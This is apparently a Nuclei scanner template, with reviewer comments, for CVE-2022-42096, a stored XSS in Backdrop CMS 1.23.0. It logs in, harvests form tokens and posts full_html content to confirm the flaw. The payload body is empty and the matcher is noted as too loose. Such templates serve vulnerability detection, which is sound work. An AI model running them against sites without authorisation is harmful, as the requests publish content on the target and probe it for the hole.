# Nuclei template for CVE-2022-42096: stored XSS (CWE-79) in Backdrop CMS 1.23.0
# via Post content. The CVSS vector below (PR:H, UI:R, S:C) means exploitation
# needs a highly privileged account and victim interaction, hence medium / 4.8.
#
# Request flow (cookie-reuse keeps the session across the five raw requests,
# which matches metadata.max-request: 5):
#   1. GET  /?q=user/login        -- fetch the login form; form_id_1 is read from
#                                   its form_build_id
#   2. POST /?q=user/login        -- authenticate with {{username}} / {{password}}
#   3. GET  /?q=node/add/post     -- fetch the post form; form_id_1, form_id_2,
#                                   form_token and name are taken from this page
#                                   (extractors run on each response, so the most
#                                   recent match wins -- confirm against nuclei's
#                                   extractor semantics)
#   4. POST /?q=node/add/post     -- multipart submit of a post titled {{randstr}}
#                                   with body format full_html, status=1, promote=1
#   5. GET  /?q=posts/{{randstr}} -- fetch the created post for matching
#
# Review notes:
# - Tagged intrusive: request 4 creates a post on the target. With status=1 and
#   promote=1 it is presumably published and promoted (confirm against Backdrop's
#   node form); nothing in the template removes it, so plan cleanup after a scan.
# - The body[und][0][value] part is empty in this copy, and the matchers' words
#   list reads as a nested item (`- - Backdrop CMS`); both look like an original
#   marker string having been stripped. As written, a body containing
#   "Backdrop CMS" plus status 200 would match any Backdrop page and does not by
#   itself prove the stored XSS -- treat a hit as unverified until that is fixed.
# - The request sets the body's text format to full_html; that is presumably what
#   lets the injected markup through -- confirm. Defensive mitigation: restrict
#   that text format to trusted roles and apply the vendor fix (see references).
# - Extractors: form_build_id, form_id and form_token use a greedy `(.*)` while
#   name uses `(.*?)`; the greedy ones could over-capture if another `"` follows
#   on the same line of HTML. All four are internal (used only to fill later
#   requests, not reported in output).
# - The scheduled[*] and date[*] fields carry fixed 2023 dates; they sit inside a
#   block scalar, so YAML treats them as text rather than timestamps.
id: CVE-2022-42096 info: name: Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored) author: theamanrawat severity: medium description: | Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via Post content. reference: - https://github.com/backdrop/backdrop/releases/tag/1.23.0 - https://github.com/bypazs/CVE-2022-42096 - https://nvd.nist.gov/vuln/detail/CVE-2022-42096 - https://backdropcms.org classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2022-42096 cwe-id: CWE-79 epss-score: 0.00569 cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* metadata: max-request: 5 verified: true vendor: backdropcms product: backdrop_cms tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive http: - raw: - | GET /?q=user/login HTTP/1.1 Host: {{Hostname}} - | POST /?q=user/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in - | GET /?q=node/add/post HTTP/1.1 Host: {{Hostname}} - | POST /?q=node/add/post HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="title" {{randstr}} ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="field_tags[und]" {{randstr}} ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="body[und][0][summary]" ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="body[und][0][value]" ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="body[und][0][format]" full_html ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="files[field_image_und_0]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: 
form-data; name="field_image[und][0][fid]" 0 ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="field_image[und][0][display]" 1 ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="changed" ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="form_build_id" {{form_id_1}} ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="form_token" {{form_token}} ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="form_id" {{form_id_2}} ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="status" 1 ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="scheduled[date]" 2023-04-25 ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="scheduled[time]" 16:59:23 ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="promote" 1 ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="name" {{name}} ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="date[date]" 2023-04-24 ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="date[time]" 16:59:23 ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="path[auto]" 1 ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="comment" 2 ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="additional_settings__active_tab" ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="op" Save ------WebKitFormBoundaryIubltUxssi0yqDjp-- - | GET /?q=posts/{{randstr}} HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - - Backdrop CMS condition: and - type: status status: - 200 extractors: - type: regex name: form_id_1 group: 1 regex: - name="form_build_id" value="(.*)" internal: true - type: regex 
name: name group: 1 regex: - name="name" value="(.*?)" internal: true - type: regex name: form_id_2 group: 1 regex: - name="form_id" value="(.*)" internal: true - type: regex name: form_token group: 1 regex: - name="form_token" value="(.*)" internal: true  # internal extractors: values only feed later requests, never appear in scan output